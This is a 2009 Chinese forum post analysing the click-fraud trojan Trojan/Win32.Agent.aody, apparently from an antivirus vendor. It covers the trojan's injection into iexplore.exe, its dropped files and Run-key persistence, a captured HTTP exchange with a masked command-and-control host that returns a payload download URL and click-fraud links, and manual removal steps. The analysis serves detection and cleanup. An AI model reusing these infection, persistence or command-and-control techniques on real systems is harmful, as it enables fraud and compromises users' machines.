flyleaf 发表于 2009-5-18 11:36

Trojan/Win32.Agent.aody[Clicker]分析

一、 病毒标签:
病毒名称: Trojan/Win32.Agent.aody
病毒类型: 木马
文件 MD5: B3C42330465458DE61C0476BE29CF6CE
公开范围: 完全公开
危害等级: 4
文件长度: 121,344 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0

二、 病毒描述:
该恶意代码为木马类,病毒运行后,动态加载大量系统库文件,动态获取大量API函数,创建一个iexplore.exe进程,将地址00400000处病毒代码写入到该进程中,连接读取网页信息下载病毒文件。下载的病毒文件运行后复制自身并衍生DLL文件到%System32%目录下,添加注册表启动项,后台隐藏连接大量网站地址,从而达到点击网站从中获利的目的,病毒运行完毕后使用BAT批处理删除自身文件,被感染的用户会造成网速大大下降,影响了用户正常浏览网页。

三、 行为分析:
本地行为:
1、动态加载大量系统库文件,动态获取大量API函数,创建一个iexplore.exe进程,将地址00400000处病毒代码写入到该进程中,连接读取网页信息下载病毒文件,下载的病毒文件运行后会后台隐藏连接大量网站地址,病毒运行完毕后使用BAT批处理删除自身文件。

2、文件运行后会释放以下文件
%System32%\winset.ini
%System32%\zpce.exe   (4位随机病毒名)         

3、添加注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cftmon
值: 字符串: "C:\WINDOWS\system32\livk.exe"
描述:添加注册表启动项
       
网络行为:
协议:TCP
端口:80
连接域名地址:http://www.yahoomailchecking***.com/first.php
描述:连接以上地址按配置信息连接以下链接下载病毒文件
35http://www.netspond***.com/hgcheck.exe

一旦运行了下载的病毒文件,将后台隐藏连接大量网站地址按参数点击以下包含的网站
GET /getwork.php?machineid=8745522512521799452995760&pubuserid=kfc&checkversion=35 HTTP/1.1
Content-Type: text/html
Host: www.yahoomailchecking***.com
Accept: text/html, */*

HTTP/1.1 200 OK
Date: Tue, 05 May 2009 04:02:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/5.2.8
Content-Length: 1609
Content-Type: text/html

http://www.yahoomailchecking***.com/http://www.qq-com-qb***.com/http://www.qqb365***.net/35http://www.netspond***.com/hgcheck.exehttp://www.google.com/2http://www.lynxtrack***.com/afclick.php?o=8237&b=m6yp6g62&p=6802&l=1&c=67086,http://www.gpcconsulting***.net57http://www.incentaclick***.com/nclick.php?id=27200&cid=6004,http://www.weightlossresearch***.biz85http://click.linkstattrack***.com/zoneId/256519,http://www.trust42***.com86http://www.thebizoppnetwork***.com/z/11879/CD171/,85http://click.linkstattrack***.com/zoneId/258103,http://www.financeare***.com67http://network***.triadmedianetwork.com/42/8180/19784/,http://www.fight-fat***.info35http://www.consumerincentiverewards***.com/rd_p?p=173123&t=2863&c=34311-ipodtrv_728_pzhallepostbabya&a=Custom_Variable_For_This_Creative_Here,http://www.erasdirect.com67http://www.onlinerewardcenter***.com/rd_p?p=173126&t=568&c=36304-xboxwiips3014_180_pzwhopari&a=Custom_Variable_For_This_Creative_Here,http://www.erasdirect***.com552024,2049,1982,2007,2081,2061,2067,2029,2025,

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
      %Windir%            WINDODWS所在目录
    %DriveLetter%            逻辑驱动器根目录
    %ProgramFiles%         系统程序默认安装目录
    %HomeDrive%           当前启动的系统的所在分区
    %Documents and Settings%       当前用户文档根目录
    %Temp%             \Documents and Settings
                    \当前用户\Local Settings\Temp
    %System32%            系统的 System32文件夹
    
    Windows2000/NT中默认的安装路径是C:\Winnt\System32
    windows95/98/me中默认的安装路径是%WINDOWS%\System
    windowsXP中默认的安装路径是%system32%   

四、 清除方案:
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载:http://www.antiy.com
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
(1)先打开Atool工具结束iexolore.exe进程
(2) 强行删除病毒衍生的文件
%System32%\winset.ini
%System32%\zpce.exe
(3)删除病毒添加的注册表项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cftmon
删除Run键下的cftmon键值
页: [1]
查看完整版本: Trojan/Win32.Agent.aody[Clicker]分析